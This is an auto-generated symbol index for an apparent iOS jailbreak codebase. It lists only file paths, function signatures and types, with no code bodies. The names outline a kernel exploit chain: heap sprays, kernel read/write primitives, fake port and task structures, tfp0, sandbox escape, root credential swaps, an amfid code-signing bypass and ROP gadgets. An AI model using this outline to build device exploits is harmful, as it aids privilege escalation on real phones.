type patchfinder64 (line 33) | namespace patchfinder64{
class patch (line 36) | class patch{
class patch (line 38) | class patch
method patch (line 43) | patch(loc_t location, const void *patch, size_t patchSize, void(*s...
method patch (line 48) | patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy...
method slide (line 54) | void slide(uint64_t slide){
class offsetfinder64 (line 67) | class offsetfinder64 {
type text_t (line 69) | struct text_t{
type symtab_command (line 84) | struct symtab_command
type symtab_command (line 86) | struct symtab_command
type patchfinder64 (line 158) | namespace patchfinder64{
class patch (line 36) | class patch{
class patch (line 38) | class patch
method patch (line 43) | patch(loc_t location, const void *patch, size_t patchSize, void(*s...
method patch (line 48) | patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy...
method slide (line 54) | void slide(uint64_t slide){
FILE: APFS Utilities/offsetfinder.cpp
function offsetizeRN (line 17) | bool offsetizeRN(uint64_t slide){
FILE: APFS Utilities/snapshot_tools.c
type val_attrs_t (line 14) | typedef struct val_attrs {
function list_snapshots (line 20) | int list_snapshots(const char *vol){
function createNewAPFSSnapshot (line 99) | int createNewAPFSSnapshot(const char *volume, const char *snapshot) {
function renameAPFSSnapshot (line 118) | int renameAPFSSnapshot(const char *volume, const char *snapshot, const c...
function verifySnapshot (line 135) | int verifySnapshot(const char *vol, const char *name){
function mountSnapshot (line 165) | int mountSnapshot(const char *vol, const char *name, const char *dir) {
FILE: Blizzard Jailbreak/BlizzardSpawnerTools.c
function launchProcessFrozen (line 21) | int launchProcessFrozen(char *whom, char *arg1, char *arg2, char *arg3, ...
FILE: Exploits/FreeTheSandbox/IOTypes.h
type UInt (line 58) | typedef unsigned int UInt;
type SInt (line 59) | typedef signed int SInt;
type UInt32 (line 62) | typedef UInt32 IOOptionBits;
type SInt32 (line 63) | typedef SInt32 IOFixed;
type UInt32 (line 64) | typedef UInt32 IOVersion;
type UInt32 (line 65) | typedef UInt32 IOItemCount;
type UInt32 (line 66) | typedef UInt32 IOCacheMode;
type UInt32 (line 68) | typedef UInt32 IOByteCount32;
type UInt64 (line 69) | typedef UInt64 IOByteCount64;
type UInt32 (line 71) | typedef UInt32 IOPhysicalAddress32;
type UInt64 (line 72) | typedef UInt64 IOPhysicalAddress64;
type UInt32 (line 73) | typedef UInt32 IOPhysicalLength32;
type UInt64 (line 74) | typedef UInt64 IOPhysicalLength64;
type mach_vm_address_t (line 77) | typedef mach_vm_address_t IOVirtualAddress;
type vm_address_t (line 79) | typedef vm_address_t IOVirtualAddress;
type IOByteCount64 (line 83) | typedef IOByteCount64 IOByteCount;
type IOByteCount32 (line 85) | typedef IOByteCount32 IOByteCount;
type IOVirtualAddress (line 88) | typedef IOVirtualAddress IOLogicalAddress;
type IOPhysicalAddress64 (line 92) | typedef IOPhysicalAddress64 IOPhysicalAddress;
type IOPhysicalLength64 (line 93) | typedef IOPhysicalLength64 IOPhysicalLength;
type IOPhysicalAddress32 (line 99) | typedef IOPhysicalAddress32 IOPhysicalAddress;
type IOPhysicalLength32 (line 100) | typedef IOPhysicalLength32 IOPhysicalLength;
type IOPhysicalRange (line 107) | typedef struct
type IOVirtualRange (line 113) | typedef struct
type IOVirtualRange (line 120) | typedef IOVirtualRange IOAddressRange;
type IOAddressRange (line 122) | typedef struct
type IONamedValue (line 132) | typedef struct {
type IOAlignment (line 141) | typedef unsigned int IOAlignment;
type mach_port_t (line 156) | typedef mach_port_t io_object_t;
type io_object_t (line 161) | typedef io_object_t io_connect_t;
type io_object_t (line 162) | typedef io_object_t io_enumerator_t;
type io_object_t (line 163) | typedef io_object_t io_iterator_t;
type io_object_t (line 164) | typedef io_object_t io_registry_entry_t;
type io_object_t (line 165) | typedef io_object_t io_service_t;
type IODeviceNumber (line 234) | typedef unsigned int IODeviceNumber;
FILE: Exploits/FreeTheSandbox/ios13_kernel_universal.c
type ipc_port (line 101) | struct ipc_port {
type task (line 143) | struct task
function pth_commAttr_init (line 187) | void pth_commAttr_init(){
function check_num_stringlizability_4bytes (line 192) | bool check_num_stringlizability_4bytes(uint32_t input_num){
function IOSurfaceRootUserClient_remove_surface_map (line 201) | void IOSurfaceRootUserClient_remove_surface_map(io_connect_t ioconn, uin...
function IOSurfaceRootUserClient_create_surface_map (line 207) | uint32_t IOSurfaceRootUserClient_create_surface_map(io_connect_t ioconn,...
function KernelRead_1byte (line 250) | uint8_t KernelRead_1byte(uint64_t rAddr){
function KernelRead_2bytes (line 260) | uint16_t KernelRead_2bytes(uint64_t rAddr){
function KernelRead_4bytes (line 270) | uint32_t KernelRead_4bytes(uint64_t rAddr){
function KernelRead_8bytes (line 280) | uint64_t KernelRead_8bytes(uint64_t rAddr){
function KernelRead_anySize (line 292) | void KernelRead_anySize(uint64_t rAddr, char *outbuf, size_t outbuf_len){
function KernelWrite_1byte (line 307) | void KernelWrite_1byte(uint64_t wAddr, uint8_t wData){
function KernelWrite_2bytes (line 317) | void KernelWrite_2bytes(uint64_t wAddr, uint16_t wData){
function KernelWrite_4bytes (line 327) | void KernelWrite_4bytes(uint64_t wAddr, uint32_t wData){
function KernelWrite_8bytes (line 335) | void KernelWrite_8bytes(uint64_t wAddr, uint64_t wData){
function KernelWrite_anySize (line 344) | void KernelWrite_anySize(uint64_t wAddr, char *inputbuf, uint32_t inputb...
function KernelAllocate (line 354) | uint64_t KernelAllocate(size_t len){
function KernelDeallocate (line 360) | void KernelDeallocate(uint64_t addr, size_t len){
function KernelUti_GenerateOffset (line 364) | uint32_t KernelUti_GenerateOffset(uint64_t src, uint64_t data_in_src){
function kernel_exp_start (line 395) | void kernel_exp_start(io_connect_t ave_ioconn, io_connect_t surface_ioco...
function race_kmem2 (line 406) | void race_kmem2(){
function alloc_kernel_40_mem (line 413) | uint64_t alloc_kernel_40_mem(){
function empty_kernel_40_mem (line 444) | void empty_kernel_40_mem(uint64_t target_addr){
function alloc_kernel_40_mem_contains_iosurfacebuf (line 469) | uint64_t alloc_kernel_40_mem_contains_iosurfacebuf(){
function release_kernel_40_mem (line 501) | void release_kernel_40_mem(uint64_t user_iosurfaceinfo_buf){
function IOSurfaceRootUserClient_sRemoveValue (line 529) | void IOSurfaceRootUserClient_sRemoveValue(uint32_t spray_id, uint32_t key){
function _temp_kernel_reading_threadFunc (line 570) | void _temp_kernel_reading_threadFunc(){
function temp_kernel_reading (line 595) | uint64_t temp_kernel_reading(uint64_t target_addr){
function _temp_kernel_reading_categ3_threadFunc (line 649) | void _temp_kernel_reading_categ3_threadFunc(){
function temp_kernel_reading_categ3 (line 674) | uint32_t temp_kernel_reading_categ3(uint64_t target_addr){
function _temp_kernel_reading_bypass_kaslr_threadFunc (line 729) | void _temp_kernel_reading_bypass_kaslr_threadFunc(){
function temp_kernel_reading_categ5 (line 754) | uint32_t temp_kernel_reading_categ5(uint64_t target_addr){
function temp_kernel_reading_insert_valid_kaddr (line 806) | void temp_kernel_reading_insert_valid_kaddr(uint64_t target_addr){
function _temp_kernel_reading_release_mem_threadFunc (line 830) | void _temp_kernel_reading_release_mem_threadFunc(){
function temp_kernel_reading_release_mem (line 854) | uint32_t temp_kernel_reading_release_mem(uint64_t target_addr){
function prep_new_reading_primi (line 900) | void prep_new_reading_primi(){
function new_reading_primitive (line 926) | uint32_t new_reading_primitive(uint64_t target_addr){
function new_writing_primi (line 973) | void new_writing_primi(uint64_t target_addr, uint32_t write_data){
function build_fake_task_stru_forReadMem (line 996) | void build_fake_task_stru_forReadMem(char *faketask, uint64_t target_addr){
function build_fake_ipc_port_stru (line 1005) | void build_fake_ipc_port_stru(struct ipc_port *fakeport, uint64_t specif...
function build_fake_task_stru_forTFP0 (line 1024) | void build_fake_task_stru_forTFP0(struct task *faketask){
function Init_spraydata_for_TT1 (line 1047) | void Init_spraydata_for_TT1(uint32_t spray_id){
function TT1_send_spray (line 1068) | void TT1_send_spray(){
function Init_spraydata_for_TT2 (line 1091) | void Init_spraydata_for_TT2(uint32_t spray_id){
function TT2_send_spray (line 1111) | void TT2_send_spray(){
function TT2_send_spray_smallspray (line 1128) | void TT2_send_spray_smallspray(){
function TT2_release_all (line 1145) | void TT2_release_all(){
function add_new_client (line 1155) | uint8_t add_new_client(){
function remove_client (line 1170) | void remove_client(){
function encode_client_normal (line 1179) | void encode_client_normal(uint8_t isFor_finalCleaning){
function encode_client_normal222 (line 1235) | void encode_client_normal222(){
function spray_client (line 1288) | void spray_client(){
function check_if_valid_kernel_ptr (line 1392) | uint8_t check_if_valid_kernel_ptr(uint64_t target_ptr){
function find_proc_byPID (line 1398) | uint64_t find_proc_byPID(pid_t target_pid) {
function pid_t (line 1420) | pid_t look_for_proc(char *proc_name){
function pid_t (line 1450) | pid_t look_for_proc_basename(char *proc_name){
type paveway_sprayAddrs_pack (line 1476) | struct paveway_sprayAddrs_pack{
type paveway_sprayAddrs_pack (line 1480) | struct paveway_sprayAddrs_pack
function hohoo (line 1483) | uint64_t hohoo(){
function hohoo222 (line 1624) | void hohoo222(){
function clean_up_everything (line 1746) | void clean_up_everything(){
function prep_redirect_prev_clientbuf (line 1753) | void prep_redirect_prev_clientbuf(uint64_t new_prev_clientbuf){
function prep_fake_clientbuf (line 1761) | void prep_fake_clientbuf(uint64_t genuine_UserClient_kobj){
function clean_fake_clientbuf (line 1788) | void clean_fake_clientbuf(){
function prep_fake_clientbuf_read (line 1798) | void prep_fake_clientbuf_read(uint64_t genuine_UserClient_kobj){
function run_post_exp (line 1815) | void run_post_exp(){
function KernelLeak_portAddr (line 1837) | uint64_t KernelLeak_portAddr(uint64_t target_task, uint32_t portname){
function KernelLeak_portAddr2 (line 1855) | uint32_t KernelLeak_portAddr2(uint64_t target_task, uint64_t portStru){
function patch_install_tfp0 (line 1869) | void patch_install_tfp0(uint64_t target_task, uint64_t safe_tfp0){
function patch_remove_tfp0 (line 1873) | void patch_remove_tfp0(uint64_t target_task){
function mach_port_t (line 1877) | mach_port_t patch_retrieve_tfp0(){
function patch_TF_PLATFORM (line 1883) | void patch_TF_PLATFORM(uint64_t target_task){
function ubc_cs_blob_get (line 1891) | uint64_t ubc_cs_blob_get(uint64_t vp, int cputype, uint64_t offset){
function patch_CS_PLATFORM_BINARY (line 1911) | void patch_CS_PLATFORM_BINARY(uint64_t target_proc){
function patch_unsandbox_and_root (line 1922) | void patch_unsandbox_and_root(uint64_t target_proc, bool patch_root){
function safepatch_swap_unsandbox_and_root (line 1949) | void safepatch_swap_unsandbox_and_root(uint64_t target_proc){
function safepatch_unswap_unsandbox_and_root (line 1974) | void safepatch_unswap_unsandbox_and_root(uint64_t target_proc){
function safepatch_swap_kernel_cred (line 1988) | void safepatch_swap_kernel_cred(uint64_t target_proc){
function safepatch_unswap_kernel_cred (line 1997) | void safepatch_unswap_kernel_cred(uint64_t target_proc){
function safepatch_swap_spindump_cred (line 2005) | void safepatch_swap_spindump_cred(uint64_t target_proc){
function safepatch_unswap_spindump_cred (line 2034) | void safepatch_unswap_spindump_cred(uint64_t target_proc){
function safepatch_swap_containermanagerd_cred (line 2050) | void safepatch_swap_containermanagerd_cred(uint64_t target_proc){
function safepatch_unswap_containermanagerd_cred (line 2069) | void safepatch_unswap_containermanagerd_cred(uint64_t target_proc){
function patch_root (line 2073) | void patch_root(uint64_t target_proc){
function seek_out_proc_who_request_tfp0 (line 2093) | uint64_t seek_out_proc_who_request_tfp0() {
function build_tfp0_persistence_for_research_purpose (line 2127) | void build_tfp0_persistence_for_research_purpose(){
function ios13_kernel_pwn (line 2171) | void ios13_kernel_pwn(io_connect_t ioconn, io_connect_t surface_ioconn){
function binary_load_addr (line 2507) | uint64_t binary_load_addr(mach_port_t tp) {
function TaskRead_4bytes (line 2542) | uint32_t TaskRead_4bytes(mach_port_t task, uint64_t rAddr){
function TaskRead_8bytes (line 2549) | uint64_t TaskRead_8bytes(mach_port_t task, uint64_t rAddr){
function TaskWrite_1byte (line 2556) | void TaskWrite_1byte(mach_port_t task, uint64_t wAddr, uint8_t wData){
function TaskWrite_4bytes (line 2560) | void TaskWrite_4bytes(mach_port_t task, uint64_t wAddr, uint32_t wData){
function TaskWrite_8bytes (line 2564) | void TaskWrite_8bytes(mach_port_t task, uint64_t wAddr, uint64_t wData){
function TaskWrite_anySize (line 2568) | void TaskWrite_anySize(mach_port_t task, uint64_t wAddr, char *inputbuf,...
function TaskAllocate (line 2572) | uint64_t TaskAllocate(mach_port_t task, size_t len){
function TaskDeallocate (line 2578) | void TaskDeallocate(mach_port_t task, uint64_t addr, size_t len){
type exception_raise_request (line 2597) | typedef struct {
type exception_raise_reply (line 2605) | typedef struct {
type cdHashType (line 2626) | enum cdHashType {
type cdHashType (line 2633) | enum cdHashType
function set_exception_handler (line 2867) | void set_exception_handler(mach_port_t amfid_task_port){
function patch_amfid (line 2889) | void patch_amfid(pid_t amfid_pid){
function find_amfid_OFFSET_MISValidate_symbol (line 2909) | uint64_t find_amfid_OFFSET_MISValidate_symbol(uint8_t *amfid_macho){
function find_amfid_OFFSET_gadget (line 2969) | uint64_t find_amfid_OFFSET_gadget(uint8_t *amfid_macho){
type stat (line 3004) | struct stat
function display_ip_address (line 3025) | void display_ip_address(){
function remove_crash_thats_caused_by_exp (line 3045) | void remove_crash_thats_caused_by_exp(const char *name)
function run_post_exp_from_tfp0 (line 3065) | void run_post_exp_from_tfp0(){
FILE: Exploits/FreeTheSandbox/ios13_userspace.c
type mach_msg_guard_flags_t (line 56) | typedef unsigned int mach_msg_guard_flags_t;
function Prepare_our_Mach_server (line 72) | void Prepare_our_Mach_server(){
function isPartOf_dyldcache (line 86) | bool isPartOf_dyldcache(vm_address_t addr){
function Get_loaded_dylib_size (line 98) | size_t Get_loaded_dylib_size(void *dylib_address){
function Find_dylibcache (line 119) | void Find_dylibcache(){
function find_gadget (line 152) | uint64_t find_gadget(char *bytes, size_t len){
function find_gadget_speed (line 161) | uint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_s...
function Find_Gadgets_speed (line 221) | void Find_Gadgets_speed(){
function get_server_port (line 249) | uint32_t get_server_port(char *servername){
function mach_msg_conn_test (line 261) | void mach_msg_conn_test(){
function click_test_main (line 313) | void click_test_main(){
function xpc_conn_test (line 317) | void xpc_conn_test(){
function xpc_conn_test_exp1 (line 346) | void xpc_conn_test_exp1(){
function xpc_conn_test_forTrigger (line 387) | void xpc_conn_test_forTrigger(){
function Assemble_part2_AOP (line 418) | void Assemble_part2_AOP(uint64_t *spraymem, uint64_t spray_start_address){
function Assemble_part1_ROP (line 617) | void Assemble_part1_ROP(uint64_t *rop2_stack, uint64_t rop2_start_address){
function xpc_conn_test_exp2 (line 634) | void xpc_conn_test_exp2(){
function Retrieve_symptomsd_bootstrap_port (line 703) | uint32_t Retrieve_symptomsd_bootstrap_port(){
function Send_our_serverport (line 714) | bool Send_our_serverport(){
function mach_port_t (line 761) | mach_port_t Retrieve_symptomsd_task_port(){
function Send_overwritting_iosurfaceMap (line 779) | void Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *...
function Reply_notify_completion (line 806) | void Reply_notify_completion(){
function Send_notify_msg (line 816) | void Send_notify_msg(){
function new_guard_thing_test (line 829) | void new_guard_thing_test(){
function io_test (line 848) | void io_test(){
function kern_return_t (line 883) | kern_return_t print_all_ports(){
function trit (line 961) | void trit (io_iterator_t it,int index){
function print_cbuf (line 980) | void print_cbuf(uint8_t *buf, size_t len){
function Send_overwritting_iosurfaceMap22 (line 991) | void Send_overwritting_iosurfaceMap22(uint64_t our_data_addr, uint64_t o...
function print_char (line 1010) | void print_char(uint8_t *data_ptr, size_t data_size){
function iOS13_exploit_init (line 1021) | void iOS13_exploit_init(){
FILE: Exploits/FreeTheSandbox/ios13_userspace_pac.c
function PACSupport_pacdza (line 49) | uint64_t PACSupport_pacdza(uint64_t data_ptr){
function PACSupport_paciza (line 62) | uint64_t PACSupport_paciza(uint64_t code_ptr){
function PACSupport_pacia (line 75) | uint64_t PACSupport_pacia(uint64_t code_ptr, uint64_t modifier){
function PACSupport_xpaci (line 85) | uint64_t PACSupport_xpaci(void *code_ptr){
function PACSupport_addMask (line 89) | uint64_t PACSupport_addMask(uint64_t data_ptr, uint32_t mask){
function isPartOf_dyldcache (line 109) | bool isPartOf_dyldcache(vm_address_t addr){
function Get_loaded_dylib_size (line 121) | size_t Get_loaded_dylib_size(void *dylib_address){
function Find_dylibcache (line 141) | void Find_dylibcache(){
function find_gadget (line 172) | uint64_t find_gadget(char *bytes, size_t len){
function find_gadget_speed (line 180) | uint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_s...
function Find_aopGadgets (line 268) | void Find_aopGadgets(){
function Find_aopGadgets_speed (line 306) | void Find_aopGadgets_speed(){
function Assemble_AOP (line 342) | void Assemble_AOP(uint64_t *aop_stack, uint64_t rop_start_address){
function Assemble_AOP2 (line 348) | void Assemble_AOP2(uint64_t *spraymem, uint64_t spray_start_address){
function symptomsd_vuln_prepare1 (line 547) | void symptomsd_vuln_prepare1(){
function symptomsd_vuln_prepare2 (line 589) | void symptomsd_vuln_prepare2(int boo){
function symptomsd_vuln_trigger (line 618) | void symptomsd_vuln_trigger(int boo){
function Prepare_our_Mach_server (line 696) | void Prepare_our_Mach_server(){
function Retrieve_symptomsd_bootstrap_port (line 705) | uint32_t Retrieve_symptomsd_bootstrap_port(){
function Retrieve_midi_bootstrap_port (line 717) | uint32_t Retrieve_midi_bootstrap_port(){
function Send_our_serverport (line 727) | bool Send_our_serverport(){
function mach_port_t (line 774) | mach_port_t Retrieve_symptomsd_task_port(){
function Send_overwritting_iosurfaceMap (line 792) | void Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *...
function Reply_notify_completion (line 819) | void Reply_notify_completion(){
function Send_notify_msg (line 829) | void Send_notify_msg(){
function PACSupport_PACGA (line 840) | uint64_t PACSupport_PACGA(uint64_t code_ptr, uint64_t modifier){
function test_thread (line 850) | void test_thread(){
function exploit_start (line 865) | void exploit_start(){
FILE: Exploits/FreeTheSandbox/libsnappy.c
type mach_port_t (line 22) | typedef mach_port_t io_object_t;
type io_object_t (line 23) | typedef io_object_t io_registry_entry_t;
type UInt32 (line 25) | typedef UInt32 IOOptionBits;
function typedef (line 38) | __attribute__((aligned(4)))
function snapshot_check (line 46) | bool snapshot_check(int dirfd, const char *name)
type attrlist (line 67) | struct attrlist
function sha1_to_str (line 118) | static int sha1_to_str(const unsigned char *hash, size_t hashlen, char *...
FILE: Exploits/FreeTheSandbox/vnode.h
type lck_mtx_t (line 4) | typedef struct {
type vnode_resolve (line 21) | struct vnode_resolve
type kauth_action_t (line 23) | typedef uint32_t kauth_action_t;
type vnode (line 26) | struct vnode {
FILE: Exploits/IOKit/IOKitLib.h
type IONotificationPort (line 67) | struct IONotificationPort
type IOObject (line 1431) | typedef struct IOObject IOObject;
FILE: Exploits/IOKit/IOReturn.h
type kern_return_t (line 45) | typedef kern_return_t IOReturn;
FILE: Exploits/IOKit/IOTypes.h
type UInt (line 58) | typedef unsigned int UInt;
type SInt (line 59) | typedef signed int SInt;
type UInt32 (line 62) | typedef UInt32 IOOptionBits;
type SInt32 (line 63) | typedef SInt32 IOFixed;
type UInt32 (line 64) | typedef UInt32 IOVersion;
type UInt32 (line 65) | typedef UInt32 IOItemCount;
type UInt32 (line 66) | typedef UInt32 IOCacheMode;
type UInt32 (line 68) | typedef UInt32 IOByteCount32;
type UInt64 (line 69) | typedef UInt64 IOByteCount64;
type UInt32 (line 71) | typedef UInt32 IOPhysicalAddress32;
type UInt64 (line 72) | typedef UInt64 IOPhysicalAddress64;
type UInt32 (line 73) | typedef UInt32 IOPhysicalLength32;
type UInt64 (line 74) | typedef UInt64 IOPhysicalLength64;
type mach_vm_address_t (line 77) | typedef mach_vm_address_t IOVirtualAddress;
type vm_address_t (line 79) | typedef vm_address_t IOVirtualAddress;
type IOByteCount64 (line 83) | typedef IOByteCount64 IOByteCount;
type IOByteCount32 (line 85) | typedef IOByteCount32 IOByteCount;
type IOVirtualAddress (line 88) | typedef IOVirtualAddress IOLogicalAddress;
type IOPhysicalAddress64 (line 92) | typedef IOPhysicalAddress64 IOPhysicalAddress;
type IOPhysicalLength64 (line 93) | typedef IOPhysicalLength64 IOPhysicalLength;
type IOPhysicalAddress32 (line 99) | typedef IOPhysicalAddress32 IOPhysicalAddress;
type IOPhysicalLength32 (line 100) | typedef IOPhysicalLength32 IOPhysicalLength;
type IOPhysicalRange (line 107) | typedef struct
type IOVirtualRange (line 113) | typedef struct
type IOVirtualRange (line 120) | typedef IOVirtualRange IOAddressRange;
type IOAddressRange (line 122) | typedef struct
type IONamedValue (line 132) | typedef struct {
type IOAlignment (line 141) | typedef unsigned int IOAlignment;
type mach_port_t (line 156) | typedef mach_port_t io_object_t;
type io_object_t (line 161) | typedef io_object_t io_connect_t;
type io_object_t (line 162) | typedef io_object_t io_enumerator_t;
type io_object_t (line 163) | typedef io_object_t io_iterator_t;
type io_object_t (line 164) | typedef io_object_t io_registry_entry_t;
type io_object_t (line 165) | typedef io_object_t io_service_t;
type IODeviceNumber (line 234) | typedef unsigned int IODeviceNumber;
FILE: Exploits/sock_port/exploit.c
function set_minmtu (line 13) | int set_minmtu(int sock, int *minmtu) {
function get_minmtu (line 17) | int get_minmtu(int sock, int *minmtu) {
function get_prefertempaddr (line 22) | int get_prefertempaddr(int sock, int *prefertempaddr) {
function set_prefertempaddr (line 27) | int set_prefertempaddr(int sock, int *prefertempaddr) {
function get_pktinfo (line 31) | int get_pktinfo(int sock, struct in6_pktinfo *pktinfo) {
function set_pktinfo (line 36) | int set_pktinfo(int sock, struct in6_pktinfo *pktinfo) {
function free_socket_options (line 41) | int free_socket_options(int sock) {
function get_socket (line 46) | int get_socket() {
function get_socket_with_dangling_options (line 65) | int get_socket_with_dangling_options() {
function mach_port_t (line 76) | mach_port_t new_port() {
function find_port_via_uaf (line 92) | uint64_t find_port_via_uaf(mach_port_t port, int disposition) {
function task_self_addr (line 121) | uint64_t task_self_addr() {
type ip6_pktopts (line 136) | struct ip6_pktopts
type ip6_pktopts (line 136) | struct ip6_pktopts
type in6_pktinfo (line 139) | struct in6_pktinfo
type ip6_pktopts (line 145) | struct ip6_pktopts
type in6_pktinfo (line 172) | struct in6_pktinfo
type in6_pktinfo (line 173) | struct in6_pktinfo
function rk64_via_uaf (line 179) | uint64_t rk64_via_uaf(uint64_t addr) {
function free_via_uaf (line 190) | int free_via_uaf(uint64_t addr) {
function mach_port_waitq_flags (line 242) | static inline uint32_t mach_port_waitq_flags() {
function mach_port_t (line 254) | mach_port_t get_tfp0() {
FILE: Exploits/sock_port/exploit.h
type route_in6 (line 28) | struct route_in6 {
type ip6po_rhinfo (line 36) | struct ip6po_rhinfo {
type ip6po_nhinfo (line 41) | struct ip6po_nhinfo {
type ip6_pktopts (line 46) | struct ip6_pktopts {
type kport_t (line 67) | typedef volatile struct {
type ktask_t (line 108) | typedef struct {
FILE: Exploits/sock_port/exploit_utilities.c
function mach_port_t (line 12) | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int c...
function message_size_for_kalloc_size (line 60) | size_t message_size_for_kalloc_size(size_t kalloc_size) {
function mach_port_t (line 65) | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t...
function trigger_gc (line 116) | void trigger_gc() {
function init_IOSurface (line 154) | int init_IOSurface() {
function deinit_IOSurface (line 166) | void deinit_IOSurface() {
function spray_IOSurface (line 170) | int spray_IOSurface(void *data, size_t size) {
FILE: Exploits/sock_port/exploit_utilities.h
type ool_msg (line 23) | struct ool_msg {
type simple_msg (line 29) | struct simple_msg {
FILE: Exploits/sock_port/include/IOKit/IOKitLib.h
type IONotificationPort (line 64) | struct IONotificationPort
type IOObject (line 1258) | typedef struct IOObject IOObject;
FILE: Exploits/sock_port/include/IOKit/IOReturn.h
type kern_return_t (line 45) | typedef kern_return_t IOReturn;
FILE: Exploits/sock_port/include/IOKit/IOTypes.h
type UInt32 (line 72) | typedef UInt32 IOOptionBits;
type SInt32 (line 73) | typedef SInt32 IOFixed;
type UInt32 (line 74) | typedef UInt32 IOVersion;
type UInt32 (line 75) | typedef UInt32 IOItemCount;
type UInt32 (line 76) | typedef UInt32 IOCacheMode;
type UInt32 (line 78) | typedef UInt32 IOByteCount32;
type UInt64 (line 79) | typedef UInt64 IOByteCount64;
type UInt32 (line 81) | typedef UInt32 IOPhysicalAddress32;
type UInt64 (line 82) | typedef UInt64 IOPhysicalAddress64;
type UInt32 (line 83) | typedef UInt32 IOPhysicalLength32;
type UInt64 (line 84) | typedef UInt64 IOPhysicalLength64;
type mach_vm_address_t (line 87) | typedef mach_vm_address_t IOVirtualAddress;
type vm_address_t (line 89) | typedef vm_address_t IOVirtualAddress;
type IOByteCount64 (line 93) | typedef IOByteCount64 IOByteCount;
type IOByteCount32 (line 95) | typedef IOByteCount32 IOByteCount;
type IOVirtualAddress (line 98) | typedef IOVirtualAddress IOLogicalAddress;
type IOPhysicalAddress64 (line 102) | typedef IOPhysicalAddress64 IOPhysicalAddress;
type IOPhysicalLength64 (line 103) | typedef IOPhysicalLength64 IOPhysicalLength;
type IOPhysicalAddress32 (line 109) | typedef IOPhysicalAddress32 IOPhysicalAddress;
type IOPhysicalLength32 (line 110) | typedef IOPhysicalLength32 IOPhysicalLength;
type IOPhysicalRange (line 117) | typedef struct
type IOVirtualRange (line 123) | typedef struct
type IOVirtualRange (line 130) | typedef IOVirtualRange IOAddressRange;
type IOAddressRange (line 132) | typedef struct
type IONamedValue (line 142) | typedef struct {
type IOAlignment (line 151) | typedef unsigned int IOAlignment;
type OSObject (line 167) | struct OSObject
type mach_port_t (line 169) | typedef mach_port_t io_object_t;
type io_object_t (line 175) | typedef io_object_t io_connect_t;
type io_object_t (line 176) | typedef io_object_t io_enumerator_t;
type io_object_t (line 177) | typedef io_object_t io_iterator_t;
type io_object_t (line 178) | typedef io_object_t io_registry_entry_t;
type io_object_t (line 179) | typedef io_object_t io_service_t;
type IODeviceNumber (line 242) | typedef unsigned int IODeviceNumber;
FILE: Exploits/sock_port/include/IOKit/OSMessageNotification.h
type natural_t (line 78) | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
type OSNotificationHeader (line 80) | struct OSNotificationHeader {
type IOServiceInterestContent (line 92) | struct IOServiceInterestContent {
type IOAsyncCompletionContent (line 97) | struct IOAsyncCompletionContent {
type OSNotificationHeader (line 107) | typedef struct OSNotificationHeader OSNotificationHeader;
type IOServiceInterestContent (line 108) | typedef struct IOServiceInterestContent IOServiceInterestContent;
type IOAsyncCompletionContent (line 109) | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
FILE: Exploits/sock_port/iosurface.c
function IOSurface_init (line 16) | bool
function IOSurface_deinit (line 61) | void
function IOSurface_set_value (line 76) | bool
function IOSurface_get_value (line 100) | static bool
function IOSurface_remove_value (line 123) | static bool
function base255_encode (line 147) | static uint32_t
function xml_units_for_data_size (line 163) | static size_t
function serialize_IOSurface_data_array (line 175) | static size_t
function IOSurface_spray_with_gc_internal (line 202) | static bool
function IOSurface_spray_with_gc (line 286) | bool
function IOSurface_spray_size_with_gc (line 294) | bool
function IOSurface_spray_read_array (line 308) | bool
function IOSurface_spray_read_all_data (line 364) | bool
function IOSurface_spray_remove_array (line 382) | bool
function IOSurface_spray_clear (line 392) | bool
FILE: Exploits/sock_port/iosurface.h
type _IOSurfaceFastCreateArgs (line 110) | struct _IOSurfaceFastCreateArgs {
type IOSurfaceLockResult (line 120) | struct IOSurfaceLockResult {
type IOSurfaceValueArgs (line 128) | struct IOSurfaceValueArgs {
type IOSurfaceValueArgs_string (line 137) | struct IOSurfaceValueArgs_string {
type IOSurfaceValueResultArgs (line 144) | struct IOSurfaceValueResultArgs {
type IOSurfaceValueArgs (line 149) | struct IOSurfaceValueArgs
FILE: Exploits/sock_port/kernel_memory.c
function init_kernel_memory (line 13) | void init_kernel_memory(mach_port_t tfp0) {
function kalloc (line 17) | uint64_t kalloc(vm_size_t size) {
function kfree (line 23) | void kfree(mach_vm_address_t address, vm_size_t size) {
function kread (line 27) | size_t kread(uint64_t where, void *p, size_t size) {
function rk32 (line 45) | uint32_t rk32(uint64_t where) {
function rk64 (line 51) | uint64_t rk64(uint64_t where) {
function kwrite (line 57) | size_t kwrite(uint64_t where, const void *p, size_t size) {
function wk32 (line 75) | void wk32(uint64_t where, uint32_t what) {
function wk64 (line 81) | void wk64(uint64_t where, uint64_t what) {
function find_port (line 86) | uint64_t find_port(mach_port_name_t port, uint64_t task_self) {
FILE: Exploits/sock_port/offsets.h
type kstruct_offset (line 4) | enum kstruct_offset {
type kstruct_offset (line 53) | enum kstruct_offset
FILE: Kernel Utilities/kernSymbolication.c
function find_symbol (line 23) | uint64_t find_symbol(const char *symbol, bool verbose) {
function find_macho_header (line 128) | uint32_t find_macho_header() {
function decompressKernelCache (line 138) | int decompressKernelCache(const char *kernelcache) {
FILE: Kernel Utilities/kernSymbolication.h
type symbol (line 22) | struct symbol {
FILE: Kernel Utilities/kernel_utils.h
type kmap_hdr_t (line 46) | typedef struct {
FILE: Kernel Utilities/kexecute.c
function mach_port_t (line 12) | mach_port_t PrepareUserClient(void){
function initializeKernelExecute (line 37) | void initializeKernelExecute(void) {
function terminateKernelExecute (line 64) | void terminateKernelExecute(void){
function kexecute (line 71) | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, ...
FILE: Kernel Utilities/lzssdec.cpp
class lzssdecompress (line 25) | class lzssdecompress
method lzssdecompress (line 49) | lzssdecompress()
method reset (line 63) | void reset()
method decompress (line 76) | void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uin...
method flush (line 125) | void flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused)
method copyfromdict (line 137) | void copyfromdict()
